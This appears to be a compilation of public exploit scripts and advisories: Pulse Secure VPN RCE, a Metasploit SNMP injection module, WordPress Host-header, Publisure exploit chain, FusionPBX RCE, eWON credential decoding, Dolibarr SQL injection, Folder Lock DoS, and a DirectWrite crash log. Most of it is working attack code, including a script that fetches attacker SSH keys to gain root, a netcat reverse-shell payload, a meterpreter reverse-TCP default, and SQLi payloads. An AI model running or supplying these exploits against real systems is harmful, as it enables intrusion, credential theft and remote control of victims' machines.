Telegram : @m_zhrii
Email : neoboy503@gmail.com
#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
# Reference: https://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
#
# Please Note, Alyssa or myself are not responsible with what is done with this code. Please use this at your own discretion and with proper authrization.
# We will not bail you out of jail, go to court, etc if you get caught using this maliciously. Be smart and remember, hugs are free.
#
# Imports
import requests
import urllib
from bs4 import BeautifulSoup
# Host information
host = '' # Host to exploit
login_url = '/dana-na/auth/url_admin/login.cgi' # Login page
CMDInjectURL = '/dana-admin/diag/diag.cgi' # Overwrites the Template when using tcpdump
CommandExecURL = '/dana-na/auth/setcookie.cgi' # Executes the code
# Login Credentials
user = 'admin' # Default Username
password = 'password' # Default Password
# Necessary for Curl
downloadHost = '' # IP or FQDN for host running webserver
port = '' # Port where web service is running. Needs to be a string, hence the quotes.
# Proxy Configuration
# Uncomment if you need to use a proxy or for debugging requests
proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080',
}
# Headers for requests
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language':'en-US,en;q=0.5',
'Accept-Encoding':'gzip, deflate',
'Content-Type':'application/x-www-form-urlencoded',
}
# Cookies to send with request
cookies = {
'lastRealm':'Admin%20Users',
'DSSIGNIN':'url_admin',
'DSSignInURL':'/admin/',
'DSPERSISTMSG':'',
}
# Data for post request
loginData = {
'tz_offset': 0,
'username': user,
'password': password,
'realm': 'Admin Users',
'btnSubmit': 'Sign In',
}
s = requests.Session() # Sets up the session
s.proxies = proxies # Sets up the proxies
# Disable Warnings from requests library
requests.packages.urllib3.disable_warnings()
# Administrator Login logic
# Probably wouldn't have figured this out without help from @buffaloverflow
def adminLogin():
global xsAuth
global _headers
# Send the intial request
r = requests.get('https://%s/dana-na/auth/url_admin/welcome.cgi' % host, cookies=cookies, headers=headers, verify=False, proxies=proxies)
print('[#] Logging in...') # Self Explanatory
r = s.post('https://' + host + login_url, data=loginData,verify=False, proxies=proxies, allow_redirects=False) # sends login post request
print('[#] Sent Login Request...')
# Login Logic
if r.status_code == 302 and 'welcome.cgi' in r.headers.get("location",""):
referer = 'https://%s%s' %(host, r.headers["location"]) # Gets the referer
r = s.get(referer, verify=False) # Sends a get request
soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
FormDataStr = soup.find('input', {'id':'DSIDFormDataStr'})["value"] # Gets DSIDFormDataStr
print('[#] Grabbing xsauth...')
xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
print('[!] Got xsauth: ' + xsAuth) # Self Explanatory
data = {'btnContinue':'Continue the session', 'FormDataStr':FormDataStr, 'xsauth':xsAuth} # Submits the continue session page
_headers = headers # Sets the headers
_headers.update({'referer':referer}) # Updates the headers
r = s.post('https://%s' %(host + login_url), data=data, headers=_headers, verify=False, proxies=proxies) #Sends a new post request
print('[+] Logged in!') # Self Explanatory
# Command injection logic
def cmdInject(command):
r = s.get('https://' + host + CMDInjectURL, verify=False, proxies=proxies)
if r.status_code == 200:
soup = BeautifulSoup(r.text, 'html.parser') # Sets up HTML Parser
xsAuth = soup.find('input', {'name':'xsauth'})["value"] # Gets the cross site auth token
payload = {
'a':'td',
'chkInternal':'On',
'optIFInternal':'int0',
'pmisc':'on',
'filter':'',
'options':'-r$x="%s",system$x# 2>/data/runtime/tmp/tt/setcookie.thtml.ttc <' %command,
'toggle':'Start+Sniffing',
'xsauth':xsAuth
}
# Takes the generated URL specific to the command then encodes it in hex for the DSLaunchURL cookie
DSLaunchURL_cookie = {'DSLaunchURL':(CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+urllib.quote_plus(command)+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth).encode("hex")}
# print('[+] Sending Command injection: %s' %command) # Self Explanatory. Useful for seeing what commands are run
# Sends the get request to overwrite the template
r = s.get('https://' + host + CMDInjectURL+'?a=td&chkInternal=on&optIFInternal=int0&pmisc=on&filter=&options=-r%24x%3D%22'+command+'%22%2Csystem%24x%23+2%3E%2Fdata%2Fruntime%2Ftmp%2Ftt%2Fsetcookie.thtml.ttc+%3C&toggle=Start+Sniffing&xsauth='+xsAuth, cookies=DSLaunchURL_cookie, verify=False, proxies=proxies)
# Sends the get request to execute the code
r = s.get('https://' + host + CommandExecURL, verify=False)
# Main logic
if __name__ == '__main__':
adminLogin()
try:
print('[!] Starting Exploit')
print('[*] Opening Firewall port...')
cmdInject('iptables -A INPUT -p tcp --dport 6667 -j ACCEPT') # Opens SSH port
print('[*] Downloading Necessary Files....')
cmdInject('/home/bin/curl '+downloadHost+':'+port+'/cloud_sshd_config -o /tmp/cloud_sshd_config') # download cloud_sshd_config
cmdInject('/home/bin/curl '+downloadHost+':'+port+'/authorized_keys -o /tmp/authorized_keys') # download authorized_keys
print('[*] Backing up Files...')
cmdInject('cp /etc/cloud_sshd_config /etc/cloud_sshd_config.bak') # backup cloud_sshd_config
cmdInject('cp /.ssh/authorized_keys /.ssh/authorized_keys.bak') # backp authorized_keys
print('[*] Overwriting Old Files...')
cmdInject('cp /tmp/cloud_sshd_config /etc/cloud_sshd_config') # overwrite cloud_sshd_config
cmdInject('cp /tmp/authorized_keys /.ssh/authorized_keys') # overwrite authorized_keys
print('[*] Restarting SSHD...')
cmdInject('kill -SIGHUP $(pgrep -f "sshd-ive")') # Restart sshd via a SIGHUP
print('[!] Done Exploiting the system.')
print('[!] Please use the following command:')
print('[!] ssh -p6667 root@%s') %(host)
except Exception as e:
raise
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::SNMPClient
include Msf::Exploit::CmdStager
def initialize(info={})
super(update_info(info,
'Name' => "AwindInc SNMP Service Command Injection",
'Description' => %q{
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to ftpfw.sh system command, leading to command injection.
A valid SNMP read-write community is required to exploit this vulnerability.
The following devices are known to be affected by this issue:
* Crestron Airmedia AM-100 <= version 1.5.0.4
* Crestron Airmedia AM-101 <= version 2.5.0.12
* Awind WiPG-1600w <= version 2.0.1.8
* Awind WiPG-2000d <= version 2.1.6.2
* Barco wePresent 2000 <= version 2.1.5.7
* Newline Trucast 2 <= version 2.1.0.5
* Newline Trucast 3 <= version 2.1.3.7
},
'License' => MSF_LICENSE,
'Author' =>
[
'Quentin Kaiser <kaiserquentin[at]gmail.com>'
],
'References' =>
[
['CVE', '2017-16709'],
['URL', 'https://github.com/QKaiser/awind-research'],
['URL', 'https://qkaiser.github.io/pentesting/2019/03/27/awind-device-vrd/']
],
'DisclosureDate' => '2019-03-27',
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_ARMLE],
'Privileged' => true,
'Targets' => [
['Unix In-Memory',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_memory,
'Payload' => {
'Compat' => {'PayloadType' => 'cmd', 'RequiredCmd' => 'openssl'}
}
],
['Linux Dropper',
'Platform' => 'linux',
'Arch' => ARCH_ARMLE,
'CmdStagerFlavor' => %w[wget],
'Type' => :linux_dropper
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {'PAYLOAD' => 'linux/armle/meterpreter_reverse_tcp'}))
register_options(
[
OptString.new('COMMUNITY', [true, 'SNMP Community String', 'private']),
])
end
def check
begin
connect_snmp
sys_description = snmp.get_value('1.3.6.1.2.1.1.1.0').to_s
print_status("Target system is #{sys_description}")
# AM-100 and AM-101 considered EOL, no fix so no need to check version.
model = sys_description.scan(/Crestron Electronics (AM-100|AM-101)/).flatten.first
case model
when 'AM-100', 'AM-101'
return CheckCode::Vulnerable
else
# TODO: insert description check for other vulnerable models (that I don't have)
# In the meantime, we return 'safe'.
return CheckCode::Safe
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
disconnect_snmp
end
Exploit::CheckCode::Unknown
end
def inject_payload(cmd)
begin
connect_snmp
varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,1,0],SNMP::OctetString.new(cmd))
resp = snmp.set(varbind)
if resp.error_status == :noError
print_status("Injection successful")
else
print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
disconnect_snmp
end
end
def trigger
begin
connect_snmp
varbind = SNMP::VarBind.new([1,3,6,1,4,1,3212,100,3,2,9,5,0],SNMP::Integer32.new(1))
resp = snmp.set(varbind)
if resp.error_status == :noError
print_status("Trigger successful")
else
print_status("OID not writable or does not provide WRITE access with community '#{datastore['COMMUNITY']}'")
end
rescue SNMP::RequestTimeout
print_error("#{ip} SNMP request timeout.")
rescue Rex::ConnectionError
print_error("#{ip} Connection refused.")
rescue SNMP::UnsupportedVersion
print_error("#{ip} Unsupported SNMP version specified. Select from '1' or '2c'.")
rescue ::Interrupt
raise $!
rescue ::Exception => e
print_error("Unknown error: #{e.class} #{e}")
ensure
disconnect_snmp
end
end
def exploit
case target['Type']
when :unix_memory
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
def execute_command(cmd, opts = {})
# The payload must start with a valid FTP URI otherwise the injection point is not reached
cmd = "ftp://1.1.1.1/$(#{cmd.to_s})"
# When the FTP download fails, the script calls /etc/reboot.sh and we loose the callback
# We therefore kill /etc/reboot.sh before it reaches /sbin/reboot with that command and
# keep our reverse shell opened :)
cmd << "$(pkill -f /etc/reboot.sh)"
# the MIB states that camFWUpgradeFTPURL must be 255 bytes long so we pad
cmd << "A" * (255-cmd.length)
# we inject our payload in camFWUpgradeFTPURL
print_status("Injecting payload")
inject_payload(cmd)
# we trigger the firmware download via FTP, which will end up calling this
# "/bin/getRemoteURL.sh %s %s %s %d"
print_status("Triggering call")
trigger
end
end
#!/usr/bin/perl -w
#
# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
# Type: Remote
# Risk: High
#
# Solution:
# Set security headers to web server and no-cache for Cache-Control
#
# Simple Attack Scenarios:
#
# o This attack can bypass Simple WAF to access restricted content on the web server,
# something like phpMyAdmin;
#
# o This attack can deface the vulnerable Wordpress website with content from the default vhost;
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# # Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# # ====================================================================================
# # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
# # > Host => default-vhost.com
# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# # > Content-Type => application/x-www-form-urlencoded
# # < Connection => close
# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Location => https://default-vhost.com/
# # < Server => nginx
# # < Content-Type => text/html; charset=UTF-8
# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Client-Peer => 13.37.13.37:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Client-Transfer-Encoding => chunked
# # < Strict-Transport-Security => max-age=31536000;
# # < X-Powered-By => PHP/7.3.9
# # < X-Redirect-By => WordPress
# # ====================================================================================
#
#
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $attacker = shift || 'default-vhost.com';
say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Demo Exploit
# ====================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>";
if ($host !~ m/^http/){
say "# e.g. perl $0 https://target:port/ default-vhost.com";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
say "# ====================================================================================";
#####################################################################################
# Exploit Title: [PUBLISURE : From 0 to local Administrator (3 vulns) exploit-chain]
# Google Dork: [N/A]
# Date: [05/09/2019]
# Exploit Author: [Bourbon Jean-Marie (@kmkz_security) - Hacknowledge company]
# Vendor Homepage: [https://www.publisure.com/]
# Software Link: [N/C]
# Version: [version 2.1.2]
# Tested on: [Windows 7 Enterprise]
# CVE : [CVE-2019-14252, CVE-2019-14253, CVE-2019-14254]
#####################################################################################
# Improper Access Control
#
# CVSSv3: 7.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N)
# OVE ID: OVE-20190724-0002
# CVE ID: CVE-2019-14253
#
#####################################################################################
# (Pre-Authenticated) Multiples SQL injection
#
# CVSSv3: 8.2 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)
# OVE ID: OVE-20190724-0003
# CVE ID: CVE-2019-14254
#
#####################################################################################
# Unrestricted File Upload RCE
#
# CVSSv3: 9.1(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)
# OVE ID: OVE-20190724-0004
# CVE ID: CVE-2019-14252
#
#####################################################################################
# Fixes:
# Upgrade to latest product version and/or contact support for patches
#####################################################################################
I. PRODUCT
Publisure Hybrid mail is a highly efficient and cost effective alternative to traditional methods of producing and posting correspondence within an organization.
The Publisure system can either be used for centralized, internal production within your existing facilities or alternatively, it can be implemented as a fully outsourced solution.
Note that this advisory is based on a version 2.1.2 which is a legacy version since a newer one was released.
II. ADVISORY
A combination of three different vulnerabilities permits an unauthenticated attacker to gain Administrator access on the server hosting Publisure application.
III. VULNERABILITIES DESCRIPTIONS
a) The first issue permits to bypass authentication mechanism allowing malicious person to perform query on PHP forms within the /AdminDir folder that should be restricted.
b) The second weakness is that SQL queries are not well sanitized resulting in multiple SQL injection in "userAccFunctions.php" functions.
Using this two steps, an attacker can access passwords and/or grant access to user account "user" in order to become "Administrator" (for example).
c) Once successfully authenticated as an administrator, he is able to inject PHP backdoor by using "adminCons.php" form.
This backdoor will then be stored in E:\PUBLISURE\webservice\webpages\AdminDir\Templates\ folder even if removed from "adminCons.php" view (permitting to hide the malicious PHP file).
IV. PROOF OF CONCEPT
a) Access to AdminDir PHP scripts and database querying is possible whithout authentication (ex: http://192.168.13.37/AdminDir/editUser.php?id=2)
b) Vulnerable URL example: http://192.168.13.37/AdminDir/editUser.php?id=sqli
"editUser.php" vulnerable code: $user = getUserDtails($_GET['id']);
"userAccFunctions.php" vulnerable code example:
function getUserDtails($id) {
global $db;
//The reseller_accounts table has been used to store department information since PDQit
$Q = "SELECT a.username as username,a.contact_firstname,a.contact_lastname,a.email,r.company_name, a.enabled, a.record_id, a.password, a.unique_identifier, a.reseller_id, a.approval, a.resourceEditType, a.docView FROM accounts a, reseller_accounts r WHERE r.record_id = a.reseller_id AND a.record_id = $id";
$R = $db->query($Q);
return $R;
}
c) "adminCons.php" form permits to upload leading to RCE and allow attacker to hide malicious PHP code stored within "/AdminDir/Templates" folder (ex: http://192.168.13.37/AdminDir/Templates/tata.php?c=whoami)
V. RECOMMENDATIONS
a) Restrict access to administrative (and other) folder when non authenticated.
b) Prepare SQL query before execution using PDO to escape injections.
c) Check file type on file upload forms to prevent PHP code upload instead of templates.
VI. TIMELINE
July 23th, 2019: Vulnerability identification
July 30th, 2019: First contact with the editor (Publisure) and vulnerabilities acknowledgement
August 13th, 2019: Contact to vendor to ask for fix - no reply
September 04th, 2019: Vendor was informed 24h before public disclosure
September 05th, 2019: public disclosure after 45 days
VIII. LEGAL NOTICES
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or misuse of this advisory.
The applied disclosure policy is based on US CERT Responsible Disclosure Policy - https://www.us-cert.gov/vulnerability-disclosure-policy
#!/usr/bin/python3
'''
# Exploit Title: FusionPBX v4.4.8 Remote Code Execution
# Date: 13/08/2019
# Exploit Author: Askar (@mohammadaskar2)
# CVE : 2019-15029
# Vendor Homepage: https://www.fusionpbx.com
# Software link: https://www.fusionpbx.com/download
# Version: v4.4.8
# Tested on: Ubuntu 18.04 / PHP 7.2
'''
import requests
from requests.packages.urllib3.exceptions import InsecureRequestWarning
import sys
import warnings
from bs4 import BeautifulSoup
# turn off BeautifulSoup and requests warnings
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
if len(sys.argv) != 6:
print(len(sys.argv))
print("[~] Usage : ./FusionPBX-exploit.py url username password ip port")
print("[~] ./exploit.py http://example.com admin p@$$word 172.0.1.3 1337")
exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
ip = sys.argv[4]
port = sys.argv[5]
request = requests.session()
login_info = {
"username": username,
"password": password
}
login_request = request.post(
url+"/core/user_settings/user_dashboard.php",
login_info, verify=False
)
if "Invalid Username and/or Password" not in login_request.text:
print("[+] Logged in successfully")
else:
print("[+] Error with creds")
service_edit_page = url + "/app/services/service_edit.php"
services_page = url + "/app/services/services.php"
payload_info = {
# the service name you want to create
"service_name":"PwnedService3",
"service_type":"pid",
"service_data":"1",
# this value contains the payload , you can change it as you want
"service_cmd_start":"rm /tmp/z;mkfifo /tmp/z;cat /tmp/z|/bin/sh -i 2>&1|nc 172.0.1.3 1337 >/tmp/z",
"service_cmd_stop":"stop",
"service_description":"desc",
"submit":"Save"
}
request.post(service_edit_page, payload_info, verify=False)
html_page = request.get(services_page, verify=False)
soup = BeautifulSoup(html_page.text, "lxml")
for a in soup.find_all(href=True):
if "PwnedService3" in a:
sid = a["href"].split("=")[1]
break
service_page = url + "/app/services/services.php?id=" + sid + "&a=start"
print("[+] Triggering the exploit , check your netcat !")
request.get(service_page, verify=False)
#!/usr/bin/env python
'''
# Exploit Title: eWON v13.0 Authentication Bypass
# Date: 2018-10-12
# Exploit Author: Photubias – tijl[dot]Deneut[at]Howest[dot]be for www.ic4.be
# Vendor Advisory: [1] https://websupport.ewon.biz/support/news/support/ewon-security-enhancement-131s0-0
# [2] https://websupport.ewon.biz/support/news/support/ewon-security-vulnerability
# Vendor Homepage: https://www.ewon.biz
# Version: eWon Firmware 12.2 to 13.0
# Tested on: eWon Flexy with Firmware 13.0s0
Copyright 2019 Photubias(c)
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name eWON-Flewy-Pwn.py
written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be
This script will perform retrieval of clear text credentials for an eWON Flexy router
Tested on the eWON Flexy 201 with Firmware 13.0s0
Only requires a valid username (default = adm) and
this user must have the Rights 'View IO' & 'Change Configuration'
It combines two vulnerabilities: authentication bypass (fixed in 13.1s0)
and a weak password encryption, allowing cleartext password retrievel for all users (fixed in 13.3s0)
'''
username = 'adm'
import urllib2,urllib,base64,binascii,os
def decode(encpass):
xorString = "6414FE6F4C964746900208FC9B3904963A2F61"
def convertPass(password):
if (len(password)/2) > 19:
print('Error, password can not exceed 19 characters')
exit()
return hexxor(password, xorString[:len(password)])
def hexxor(a, b):
return "".join(["%x" % (int(x,16) ^ int(y,16)) for (x, y) in zip(a, b)])
if encpass.startswith('#_'):
encpass = encpass.split('_')[2]
coded = base64.b64decode(encpass)
codedhex = binascii.hexlify(coded)[:-4]
clearpass = binascii.unhexlify(convertPass(codedhex))
print('Decoded password: ' + clearpass)
def getUserData(userid, strIP):
postwsdlist = '["inf_HasJVM","usr_FirstName|1","usr_LastName|1","usr_Login|1","usr_Password|1","usr_Information|1","usr_Right|1","usr_AccessPage|1","usr_AccessDir|1","usr_CBEn|1","usr_CBMode|1","usr_CBPhNum|1","ols_AllAndAssignedPageList","ols_DirList","ols_CBMode"]'
postwsdlist = postwsdlist.replace('|1','|'+str(userid))
postdata = {'wsdList' : postwsdlist}
b64auth = base64.b64encode(username+':').replace('=','')
result = urllib2.urlopen(urllib2.Request('http://'+strIP+'/wrcgi.bin/wsdReadForm',data=urllib.urlencode(postdata) ,headers={'Authorization' : ' Basic '+b64auth})).read()
resultarr = result.split('","')
if len(resultarr) == 20:
fname = str(resultarr[1])
lname = str(resultarr[2])
usern = str(resultarr[3])
if len(usern) == 0:
return True
encpassword = resultarr[4]
print('Decoding pass for user: '+usern+' ('+fname+' '+lname+') ')
decode(encpassword)
print('---')
return True
else:
return True
strIP = raw_input('Please enter an IP [10.0.0.53]: ')
if strIP == '': strIP = '10.0.0.53'
print('---')
for i in range(20):
if not getUserData(i, strIP):
print('### That\'s all folks ;-) ###')
raw_input()
exit(0)
raw_input('All Done')
# Exploit Title: Dolibarr ERP/CRM - elemid Sql Injection
# Exploit Author: Metin Yunus Kandemir (kandemir)
# Vendor Homepage: https://www.dolibarr.org/
# Software Link: https://www.dolibarr.org/downloads
# Version: 10.0.1
# Category: Webapps
# Tested on: Xampp for Linux
# Software Description : Dolibarr ERP & CRM is a modern and easy to use
software package to manage your business...
==================================================================
elemid (POST) - Sql injection PoC
POST /dolibarr-10.0.1/htdocs/categories/viewcat.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101
Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer:
http://localhost/dolibarr-10.0.1/htdocs/categories/viewcat.php?id=102&type=product&backtopage=%2Fdolibarr-10.0.1%2Fhtdocs%2Fcategories%2Findex.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Cookie:
DOLSESSID_60ec554596b730ca6f03816d85cd400a=149432620a831537e75f713330bb0b45
Connection: close
Upgrade-Insecure-Requests: 1
token=%242y%2410%24WgwCdl0XwjnGlV3qpQ%2F7zeLEp%2FXFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=[SQLi]
Parameter: elemid (POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (EXTRACTVALUE)
Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND EXTRACTVALUE(7549,CONCAT(0x5c,0x71706a7171,(SELECT
(ELT(7549=7549,1))),0x7176787a71))
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload:
token=$2y$10$WgwCdl0XwjnGlV3qpQ/7zeLEp/XFVVoWaj17gXqY2nYZFvG1dlzsS&typeid=product&type=product&id=102&action=addintocategory&elemid=0
AND (SELECT 6353 FROM (SELECT(SLEEP(5)))aOzn)
# Exploit Title: Folder Lock v7.7.9 Denial of Service Exploit
# Date: 12.09.2019
# Vendor Homepage:https://www.newsoftwares.net/folderlock/
# Software Link: https://www.newsoftwares.net/download/folderlock7-en/folder-lock-en.exe
# Exploit Author: Achilles
# Tested Version: 7.7.9
# Tested on: Windows 7 x64
# 1.- Run python code :Folder_Lock.py
# 2.- Open EVIL.txt and copy content to clipboard
# 3.- Open Folderlock and Click 'Enter Key'
# 4.- Paste the content of EVIL.txt into the Field: 'Serial Number and Registration Key'
# 5.- Click 'Submit' and you will see a crash.
#!/usr/bin/env python
buffer = "\x41" * 6000
try:
f=open("Evil.txt","w")
print "[+] Creating %s bytes evil payload.." %len(buffer)
f.write(buffer)
f.close()
print "[+] File created!"
except:
print "File cannot be created"
Microsoft DirectWrite is a modern Windows API for high-quality text rendering. A majority of its code resides in the DWrite.dll user-mode library. It is used by a variety of widely used desktop programs (such as web browsers) and constitutes an attack surface for memory corruption bugs, as it performs the processing of untrusted font files and is written in C/C++.
Through fuzzing, we have discovered a crash caused by an invalid memory read in DWrite!sfac_GetSbitBitmap, while rasterizing the glyphs of a slightly malformed TrueType font. The problem reproduces in Microsoft Edge (supposedly not in Chrome and Firefox due to OpenType Sanitizer); below is a crash log from the Microsoft Edge renderer process, generated when trying to open a web page with the proof-of-concept font embedded:
--- cut ---
(4368.698c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
DWrite!sfac_GetSbitBitmap+0x2ad:
00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13] ds:000001b9`94823000=??
0:036> u
DWrite!sfac_GetSbitBitmap+0x2ad:
00007ffe`b1ce47bd 410fb65500 movzx edx,byte ptr [r13]
00007ffe`b1ce47c2 0811 or byte ptr [rcx],dl
00007ffe`b1ce47c4 49ffc5 inc r13
00007ffe`b1ce47c7 48ffc1 inc rcx
00007ffe`b1ce47ca 66413bc3 cmp ax,r11w
00007ffe`b1ce47ce 7471 je DWrite!sfac_GetSbitBitmap+0x331 (00007ffe`b1ce4841)
00007ffe`b1ce47d0 66ffc0 inc ax
00007ffe`b1ce47d3 ebd1 jmp DWrite!sfac_GetSbitBitmap+0x296 (00007ffe`b1ce47a6)
0:036> k
# Child-SP RetAddr Call Site
00 000000a3`a00ec740 00007ffe`b1ce3aaa DWrite!sfac_GetSbitBitmap+0x2ad
01 000000a3`a00ec840 00007ffe`b1ce3954 DWrite!GetSbitComponent+0xfe
02 000000a3`a00ec950 00007ffe`b1d4cc66 DWrite!sbit_GetBitmap+0xd0
03 000000a3`a00eca10 00007ffe`b1d43dfe DWrite!fs_ContourScan+0x3b6
04 000000a3`a00ecaf0 00007ffe`b1d43e98 DWrite!TrueTypeRasterizer::Implementation::GetBitmapInternal+0xe6
05 000000a3`a00ecb40 00007ffe`b1d42c03 DWrite!TrueTypeRasterizer::Implementation::GetBitmap+0x30
06 000000a3`a00ecbb0 00007ffe`b1d11754 DWrite!GlyphBitmapRasterizationState::RasterizeGlyph+0x8b
07 000000a3`a00ecbf0 00007ffe`bf4de1ce DWrite!DWriteGlyphLookupCache::GetGlyphBitmapInfo+0x264
08 000000a3`a00ece60 00007ffe`bf4de95f d2d1!GlyphRunAnalyzer::AddCachedGlyph+0x62
09 000000a3`a00ecf10 00007ffe`bf4e60b0 d2d1!GlyphRunAnalyzer::GetGlyphs+0x18f
0a 000000a3`a00ecf60 00007ffe`bf4f572d d2d1!GlyphRunRenderer::InitForRendering+0x2c0
0b 000000a3`a00ed0a0 00007ffe`bf55ffe4 d2d1!CHwSurfaceRenderTarget::DrawGlyphRun+0x38d
0c 000000a3`a00ed3b0 00007ffe`bf4f379e d2d1!BrushRedirectionCompatibleCommand<CCommand_DrawGlyphRun,0>::Execute+0x134
0d 000000a3`a00ed4c0 00007ffe`bf50e7ef d2d1!CHwSurfaceRenderTarget::ProcessBatch+0x3ce
0e 000000a3`a00ed570 00007ffe`bf50a0ae d2d1!CBatchSerializer::FlushInternal+0x13f
